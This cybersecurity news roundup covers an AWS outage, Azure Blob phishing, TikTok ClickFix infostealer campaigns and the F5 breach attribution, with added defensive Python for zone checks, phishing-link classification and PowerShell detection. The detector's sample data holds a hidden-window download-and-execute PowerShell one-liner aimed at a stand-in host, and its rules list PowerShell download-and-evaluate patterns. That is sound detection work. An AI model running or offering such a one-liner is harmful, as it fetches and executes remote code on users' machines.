Significant AWS Outage Causes Widespread Internet Disruption Across Global Services
In the early hours of October 20, 2025, Amazon Web Services (AWS) experienced a severe outage affecting multiple regions, with the US-EAST-1 Region at the epicenter. The disruption triggered widespread downtime across major online platforms, including Amazon[.]com, Prime Video, Canva, Perplexity AI, Hulu, and several financial and AI-based applications. According to AWS, the root cause was a DNS resolution failure affecting the DynamoDB API endpoint, which cascaded into failures across interconnected services, including EC2, Lambda, RDS, and ECS. The outage began around 3:00 AM EST and rapidly expanded, causing elevated error rates, latency issues, and service timeouts. While AWS engineers immediately initiated mitigation efforts, users across North America and Europe reported being unable to access critical services or log into applications dependent on AWS authentication. As of 8:10 AM EST, AWS confirmed recovery progress, stating that SQS queues and Lambda Event Source Mappings were being processed, though significant backlogs remained. Engineers applied multiple layers of mitigation, stabilizing DNS resolution and restoring most impacted APIs, though EC2 launch operations in US-EAST-1 continued to experience intermittent failures. Services relying on Lambda’s polling mechanisms reported delayed execution times. AWS advised customers to flush DNS caches, retry failed requests, and ensure Auto Scaling Groups were configured across multiple availability zones to improve resilience. Despite recovery efforts showing “significant signs of stabilization,” AWS noted that throttling measures remained in effect while the infrastructure cleared queued workloads.
The incident, one of the most extensive outages of 2025, has reignited discussions about cloud redundancy and single-provider risk, emphasizing the need for organizations to adopt multi-cloud architectures and proactive incident response planning to mitigate future service interruptions. This is a developing story.
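The multi-AZ advice above is easy to state and easy to get wrong in practice. The check below is an added example, not code from the article or from AWS: it walks Auto Scaling Group records in the shape of a DescribeAutoScalingGroups response (the sample groups are constructed) and flags groups that list only one zone, or that run so few instances that the listed spread cannot help.

```python
"""Flag Auto Scaling Groups that cannot ride out the loss of one Availability Zone.
Added example, not from the article or AWS. Input mimics the DescribeAutoScalingGroups
response shape; the sample groups are constructed."""

def az_resilience_findings(groups, min_azs=2):
    """Return (group name, reason) for groups spread over fewer than `min_azs`
    zones, or running too few instances for the spread to matter."""
    findings = []
    for g in groups:
        name = g["AutoScalingGroupName"]
        azs = sorted(set(g.get("AvailabilityZones", [])))
        desired = g.get("DesiredCapacity", 0)
        if len(azs) < min_azs:
            findings.append((name, f"only {len(azs)} AZ(s): {', '.join(azs) or 'none'}"))
        elif desired < 2:
            # A lone instance sits in exactly one zone no matter how many are listed.
            findings.append((name, f"DesiredCapacity {desired}: nothing to spread across {len(azs)} AZs"))
    return findings

SAMPLE_GROUPS = [  # constructed
    {"AutoScalingGroupName": "web-prod", "AvailabilityZones": ["us-east-1a", "us-east-1b", "us-east-1c"],
     "MinSize": 3, "DesiredCapacity": 6},
    {"AutoScalingGroupName": "worker-legacy", "AvailabilityZones": ["us-east-1a"],
     "MinSize": 1, "DesiredCapacity": 2},
    {"AutoScalingGroupName": "api-canary", "AvailabilityZones": ["us-east-1a", "us-east-1b"],
     "MinSize": 1, "DesiredCapacity": 1},
]

if __name__ == "__main__":
    for name, reason in az_resilience_findings(SAMPLE_GROUPS):
        print(f"{name}: {reason}")
```

Feeding it the real response from the boto3 `describe_auto_scaling_groups` paginator is a one-line change; the logic is the same.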
New Phishing Attack Exploits Azure Blob Storage to Mimic Microsoft 365 Login Portals
A new phishing attack is exploiting Microsoft’s own Azure Blob Storage service to host fake Office 365 login pages, enabling threat actors to steal user credentials through highly convincing replicas of legitimate Microsoft sites. The attackers leverage trusted subdomains and valid TLS certificates for Microsoft-owned domains, which lend their phishing portals an air of authenticity and allow them to bypass many automated security checks. Victims are lured through deceptive emails impersonating Microsoft Forms or document-sharing notifications, redirecting them to malicious URLs that masquerade as secure Microsoft sign-in pages hosted within Azure Blob containers. This technique exploits the inherent trust users and systems place in Microsoft infrastructure, allowing threat actors to stage convincing phishing attacks without triggering browser warnings. As a result, even cautious employees may unknowingly submit their credentials to a malicious endpoint. Once credentials are entered, they are exfiltrated to attacker-controlled servers, granting access to enterprise email, cloud storage, and authentication tokens that can be used for lateral movement and privilege escalation. The campaign demonstrates a growing trend of abusing legitimate cloud services for malicious hosting, effectively blurring the line between trusted and hostile infrastructure. Experts advise that blocking traffic to Azure Blob subdomains, except for an allowlist of trusted storage accounts, can reduce exposure. Additional safeguards include enforcing multi-factor authentication (MFA), monitoring login anomalies in Microsoft Entra ID, and implementing custom sign-in branding to help employees recognize genuine portals.
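The allowlist approach above hinges on matching the storage-account label correctly rather than substring-matching the domain. The following is an added example, not code from the article: it pulls URLs out of a message, recognises hosts under `blob.core.windows.net` by full suffix (so a look-alike such as `blob.core.windows.net.example.org` is not treated as Azure), and returns allow/block verdicts against an allowlist. The allowlist entry and the sample email are constructed.

```python
"""Classify links that point at Azure Blob Storage by storage-account name.
Added example, not from the article. The allowlist and sample email are constructed."""
import re
from urllib.parse import urlsplit

BLOB_SUFFIX = ".blob.core.windows.net"
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)

def blob_account(url):
    """Return the storage-account label if `url` is hosted on Azure Blob Storage,
    else None. Suffix match on the whole host, so look-alike domains do not qualify."""
    host = (urlsplit(url).hostname or "").lower()
    if not host.endswith(BLOB_SUFFIX):
        return None
    account = host[: -len(BLOB_SUFFIX)]
    # A real account name is a single label of 3-24 lowercase letters or digits.
    return account if re.fullmatch(r"[a-z0-9]{3,24}", account) else None

def classify_links(text, allowed_accounts):
    """Return (url, verdict) pairs: 'allow' for a listed account, 'block' for any
    other Azure Blob host, 'other' for everything else."""
    allowed = {a.lower() for a in allowed_accounts}
    out = []
    for url in URL_RE.findall(text):
        host = (urlsplit(url).hostname or "").lower()
        if not host.endswith(BLOB_SUFFIX):
            out.append((url, "other"))
            continue
        out.append((url, "allow" if blob_account(url) in allowed else "block"))
    return out

SAMPLE_EMAIL = """Someone shared a form with you.
Review it at https://contosodocs.blob.core.windows.net/share/index.html
Archive copy: https://x7k2pq.BLOB.core.windows.net/$web/login.htm
Help: https://blob.core.windows.net.example.org/help
Docs: https://learn.microsoft.com/azure/storage"""   # constructed

if __name__ == "__main__":
    for url, verdict in classify_links(SAMPLE_EMAIL, ["contosodocs"]):
        print(f"{verdict:5}  {url}")
```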
Update: TikTok Videos Used to Spread Info-Stealing Malware Through ClickFix Campaigns
Cybercriminals are exploiting TikTok’s viral platform to distribute info-stealing malware disguised as “free activation” or “fix” tutorials for popular software, including Spotify, Netflix, Photoshop, Windows, and Microsoft 365. These short videos lure users into running malicious PowerShell commands, typically formatted as one-liners, under the pretense of unlocking paid software for free. Once executed, the command retrieves a malicious PowerShell script that downloads secondary payloads, including Aura Stealer, which harvests browser credentials, cookies, cryptocurrency wallets, and other sensitive information. Persistence is maintained through scheduled tasks mimicking legitimate Windows processes, ensuring the malware launches at logon. Analysts have identified similar campaigns across multiple TikTok accounts, suggesting a coordinated operation designed to exploit the platform’s reach and users’ trust in creator content. Further investigation by the SANS Internet Storm Center revealed that the second-stage payload dynamically compiles and executes additional code in memory, a technique associated with self-compiling malware that evades detection. This approach allows attackers to inject shellcode directly into active processes while minimizing forensic traces. The campaigns leverage social engineering and user curiosity to bypass conventional defenses, showing that TikTok has become a favored distribution vector for modern threat actors. Security experts advise users never to copy or run commands from online videos, and advise organizations to restrict PowerShell execution policies to administrative approval only. Organizations should deploy behavioral detection tools capable of identifying script-based threats and monitor for unusual task registrations or outbound connections to malicious domains. Enhanced awareness and proactive PowerShell monitoring remain essential to preventing these socially engineered infostealer infections.
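The monitoring advice above translates into two detections: scoring PowerShell command lines for the traits of a pasted one-liner (hidden window, policy bypass, download-and-evaluate, in-memory compilation) and catching logon-triggered scheduled tasks whose names imitate Windows components but run from user-writable paths. The code below is an added example, not code from the article or from SANS ISC; the events are constructed in a simplified Sysmon-like shape and the command line uses the reserved `example.invalid` name.

```python
"""Score PowerShell command lines and scheduled-task registrations for ClickFix-style
indicators. Added example, not from the article; events are constructed, Sysmon-like."""
import re

PS_RULES = [  # deliberately broad; tune to your fleet
    ("invoke-expression", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("web-download", re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I)),
    ("encoded-command", re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)),
    ("hidden-window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("in-memory-compile", re.compile(r"\badd-type\b", re.I)),   # self-compiling stage
    ("bypass-policy", re.compile(r"-e[a-z]*\s+bypass", re.I)),  # -ep/-exec/-executionpolicy
]
# Task names that imitate Windows components; suspicious when run from user-writable paths.
LOOKALIKE_NAMES = ("svchost", "winlogon", "csrss", "wuauclt", "microsoftedgeupdate")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")

def score_powershell(cmdline):
    """Return the names of every rule that fires on a command line."""
    return [name for name, rx in PS_RULES if rx.search(cmdline)]

def suspicious_task(event):
    """True for a look-alike task name that runs at logon from a user-writable path."""
    name, action = event.get("task_name", "").lower(), event.get("action", "").lower()
    return (any(name.startswith(n) for n in LOOKALIKE_NAMES)
            and any(p in action for p in USER_WRITABLE)
            and event.get("trigger") == "logon")

def triage(events):
    """Return (event id, findings) for each event worth an analyst's look."""
    hits = []
    for ev in events:
        if ev["type"] == "process" and "powershell" in ev["image"].lower():
            names = score_powershell(ev["cmdline"])
            if len(names) >= 2:  # a single indicator is too noisy on its own
                hits.append((ev["id"], names))
        elif ev["type"] == "task_create" and suspicious_task(ev):
            hits.append((ev["id"], ["lookalike-logon-task"]))
    return hits

SAMPLE_EVENTS = [  # constructed; example.invalid is a reserved, non-resolving name
    {"id": 1, "type": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/activate)"'},
    {"id": 2, "type": "process", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\ops\\rotate-logs.ps1"},
    {"id": 3, "type": "task_create", "task_name": "svchost_update",
     "action": "C:\\Users\\Public\\svchost.exe", "trigger": "logon"},
    {"id": 4, "type": "task_create", "task_name": "GoogleUpdateTaskMachineUA",
     "action": "C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe", "trigger": "daily"},
]
```

Run `triage(SAMPLE_EVENTS)` to see the one-liner and the look-alike task flagged while the maintenance script and the vendor updater pass; the two-indicator threshold is what keeps routine `-File` invocations quiet.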
Attribution Update: UNC5221 Confirmed Behind F5 Source Code Breach
Recent intelligence confirms that the year-long breach of F5 Networks was orchestrated by UNC5221, a China-linked espionage group specializing in long-term supply chain infiltration. The threat actor maintained persistence within F5’s internal development environment from August 2024 to mid-2025, exfiltrating portions of BIG-IP source code, undisclosed vulnerabilities, and proprietary development data. This theft provides the group with a technical blueprint to identify zero-days and craft highly tailored exploits against one of the world’s most widely deployed network technologies. UNC5221’s tactics mirror its previous campaigns against Ivanti, VMware, and other edge infrastructure vendors, relying on stealthy lateral movement, credential theft, and exploitation of management-plane interfaces. By targeting critical software suppliers, the group effectively bypasses traditional perimeter defenses, embedding long-term espionage capability deep within the digital supply chain. Following public disclosure, CISA issued an emergency directive mandating that all federal agencies patch or disconnect affected F5 systems by October 31, 2025. Forensic investigations revealed UNC5221’s use of the Brickstorm malware across EDR-blind infrastructure such as ESXi hypervisors and gateway appliances, enabling persistence without detection. Their operations align with Chinese state objectives to collect intelligence, maintain covert access to Western critical infrastructure, and erode confidence in trusted vendors. The group’s demonstrated capability to steal, analyze, and weaponize proprietary source code highlights the evolving threat posed by state actors in the software supply chain ecosystem. This attribution reinforces the urgency for continuous monitoring, stronger build-chain security, and multinational collaboration to deter state-sponsored exploitation of commercial technologies.